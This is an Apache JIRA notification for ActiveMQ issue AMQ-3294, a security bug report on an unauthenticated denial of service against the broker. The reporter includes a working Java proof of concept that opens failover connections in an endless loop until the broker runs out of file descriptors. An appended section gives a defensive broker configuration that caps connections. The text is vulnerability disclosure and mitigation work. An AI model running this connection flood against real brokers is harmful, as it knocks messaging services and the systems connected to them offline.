Posted to dev@activemq.apache.org by "Luca Carettoni (JIRA)" <ji...@apache.org> on 2011/08/30 18:41:37 UTC

[jira] [Commented] (AMQ-3294) ActiveMQ failover Denial of Service

    [ https://issues.apache.org/jira/browse/AMQ-3294?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13093877#comment-13093877 ] 

Luca Carettoni commented on AMQ-3294:
-------------------------------------

After a few months, any update on this?

Thanks,
Luca

> ActiveMQ failover Denial of Service
> -----------------------------------
>
>                 Key: AMQ-3294
>                 URL: https://issues.apache.org/jira/browse/AMQ-3294
>             Project: ActiveMQ
>          Issue Type: Bug
>          Components: Broker
>    Affects Versions: 5.2.0, 5.5.0
>         Environment: Linux ubuntu 2.6.32-30-generic and other Linux versions
>            Reporter: Luca Carettoni
>              Labels: security
>
> Abusing the 'failover' feature in ActiveMQ, an unauthenticated user can trigger a Denial of Service condition against the broker service. 
> In detail, an attacker can issue multiple ActiveMQ openwire connection requests using the following connection string: 
> failover:tcp://<IP>:61616
> Due to the 'failure' mechanism, all TCP connections remain active even if a valid session is not created. 
> Please note that no valid credentials have been used. 
> After a few thousand requests, a "java.net.SocketException: Too many open files" exception is triggered causing the freeze/crash of the broker. Connected systems may crash as well. 
> During my test, the attack took around 4 minutes (in a local network) and it is highly reliable. This is most likely an abuse of the 'failover' functionality.
> I've been testing version 5.2.0 and also the latest 5.5.0 release. As both releases are affected, I assume that this issue is present in other versions as well. The problem appears in the default configuration as well as with different authentication plugins enabled.
> Proof-Of-Concept:
> --------------------
> package openwireclient;
> import javax.jms.*;
> import org.apache.activemq.ActiveMQConnectionFactory;
> public class GoAndCrash {
>     private static String url = "failover:tcp://";
>     public static void main(String[] args) throws JMSException {
>         System.out.println("\n--[ ActiveMQ Denial of Service PoC ]\n");
>         url = url.concat(args[0] + ":" + args[1]);
>         int cont = 0;
>         while (true) {
>             try {
>                 System.out.println("[*] Request #" + cont);
>                 ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("invalidUser", "invalidPass", url);
>                 Connection connection = connectionFactory.createConnection();
>                 cont++;
>                 connection.start();
>             } catch (Exception ex) {
>                //do nothing
>             }
>         }
>     }
> }
> --------------------
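A defensive counterpart to the report quoted above, added here as an example and not part of the JIRA issue or of the ActiveMQ distribution's own configuration files: the TCP transport connector in ActiveMQ's broker configuration accepts a maximumConnections URI option that caps the number of concurrent client sockets the connector will hold open, and the OpenWire wire format accepts maxInactivityDuration so that sockets that never carry traffic are closed after a timeout. The listener address, the port and the numeric limits below are assumed values chosen for illustration. The commented-out connector shows the unbounded form in which every accepted socket counts against the process file-descriptor limit; the active connector shows the bounded form.

```xml
<!-- Added example, not from the original report or the ActiveMQ project files.
     Fragment of an activemq.xml broker configuration; address, port and limits
     are assumed values. -->
<broker xmlns="http://activemq.apache.org/schema/core" brokerName="localhost">

  <transportConnectors>
    <!-- Unbounded: the connector keeps accepting sockets until the JVM
         exhausts its file descriptors ("Too many open files"). -->
    <!-- <transportConnector name="openwire" uri="tcp://0.0.0.0:61616"/> -->

    <!-- Bounded: refuse sockets beyond the cap and close idle ones.
         maximumConnections caps concurrent client connections on this connector;
         wireFormat.maxInactivityDuration (milliseconds) closes a connection on
         which no traffic has been seen for that long, including connections
         that never progressed to a valid session.
         The '&amp;' is the XML escaping of '&' inside an attribute value. -->
    <transportConnector name="openwire"
        uri="tcp://0.0.0.0:61616?maximumConnections=1000&amp;wireFormat.maxInactivityDuration=30000"/>
  </transportConnectors>

</broker>
```

Once the cap is reached the connector closes the excess socket instead of letting the broker run into descriptor exhaustion, so the limit should be sized against the broker process's open-file ulimit with headroom for the persistence store and other connectors. The cap bounds the damage; it does not identify the source, so counting established connections to the broker port per remote address (for example from ss or netstat output) and alerting when one address holds an unusual share remains the detection side of the same control.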

--
This message is automatically generated by JIRA.
For more information on JIRA, see: http://www.atlassian.com/software/jira